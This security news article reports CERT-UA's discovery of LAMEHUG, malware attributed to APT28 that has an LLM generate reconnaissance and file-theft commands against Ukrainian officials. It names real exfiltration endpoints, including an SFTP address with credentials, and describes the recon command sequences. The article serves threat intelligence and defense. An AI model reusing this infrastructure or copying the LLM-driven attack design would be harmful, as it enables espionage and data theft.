APT28 Hackers Unveil First LLM-Powered Malware, Enhancing Attack Techniques with AI

APT28 Hackers Unveil First LLM-Powered Malware, Enhancing Attack Techniques with AI

Ukraine’s Computer Emergency Response Team (CERT-UA) has publicly reported the emergence of LAMEHUG, marking it as the inaugural malware to embed large language model (LLM) capabilities directly into its attack chain.

This campaign targets Ukrainian government officials through phishing emails masquerading as communications from ministry representatives.

These emails deliver ZIP archives containing PyInstaller-compiled Python executables, such as “Додаток.pdf.zip,” which execute upon extraction.

CERT-UA attributes the operation to APT28, also known as Fancy Bear a threat actor linked to Russia’s GRU Unit 26165 with moderate confidence.

Discovery and Attribution

Analysis indicates APT28 utilized around 270 Hugging Face tokens for API authentication, framing this as a proof-of-concept (PoC) exploration of LLM weaponization in state-sponsored cyber espionage.

The malware’s simplistic code, lacking advanced obfuscation or evasion tactics, coupled with its deployment in Ukraine a known testing ground for Russian cyber tools suggests experimental rather than fully operational intent.

Multiple variants, including “Додаток.pif,” “save_document.py,” “AI_generator_uncensored_Canvas_PRO_v0.9.exe,” “AI_image_generator_v0.95.exe,” and “image.py,” exhibit evolving exfiltration methods, underscoring ongoing refinement.

Attachment.pif.pdf

At its core, LAMEHUG leverages the Qwen2.5-Coder-32B-Instruct LLM via Hugging Face’s API to generate real-time commands from base64-encoded prompts, enabling dynamic reconnaissance and data harvesting.

For instance, the “Додаток.pif” variant employs prompts to create a directory at C:ProgramDatainfo and compile system details encompassing hardware specs via WMIC, process lists with tasklist, network configurations through ipconfig, and Active Directory enumerations using dsquery into a text file for exfiltration.

Another prompt directs recursive copying of Office documents, PDFs, and text files from user directories like Documents, Downloads, and Desktop.

Technical Innovations

Variants disguised as AI image generators use provocative prompts, such as generating images of “curvy naked woman sitting, long beautiful legs, front view, full body view, visible face,” to lure users while covertly interfacing with Flux AI APIs and executing background data collection.

The malware’s flow involves sending predefined prompts to the LLM, receiving tailored command sequences, and executing them immediately via cmd.exe, facilitating comprehensive intelligence gathering on systeminfo, CPU/memory metrics, disk details, MAC/IP addresses, user groups, and AD structures.

Exfiltration varies by variant: “image.py” employs SFTP to upload data to 144.126.202.227:22 using credentials “upstage/upstage,” while “Додаток.pif” uses HTTP POST to stayathomeclasses[.]com/slpw/up.php.

APT28 Hackers
image.py prompts

According to the Cato Networks Report, this LLM-driven approach poses severe challenges to traditional defenses, as signature-based detection falters against dynamically generated commands, network traffic mimics legitimate AI API calls, and behavioral analytics demand novel heuristics for LLM-powered anomalies.

Security recommendations emphasize shadow AI controls, enforcing approved LLM access, real-time data loss prevention, and visibility via tools like Cato CASB.

Network protections include ML-based malware detection, DNS security, and application controls focused on AI platforms.

Extended detection and response (XDR) solutions enable AI/ML threat hunting, automated incident correlation, and one-click remediation, while zero-trust network access (ZTNA) microsegmentation curbs lateral movement.

LAMEHUG signals a paradigm shift toward AI-augmented cyber threats, with APT28’s PoC likely preluding more refined iterations.

Organizations adopting Secure Access Service Edge (SASE) platforms are better equipped to counter these evolutions through integrated behavioral analysis and AI-aware defenses.

Indicators of Compromise (IoCs)

MD5 SHA256 Filename
abe531e9f1e642c47260fac40dc41f59 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777 Додаток[.]pif
3ca2eaf204611f3314d802c8b794ae2c d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e AI_generator_uncensored_Canvas_PRO_v0.9[.]exe
f72c45b658911ad6f5202de55ba6ed5c bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3 AI_image_generator_v0.95[.]exe
81cd20319c8f0b2ce499f9253ce0a6a8 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715 Image[.]py

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!


Source link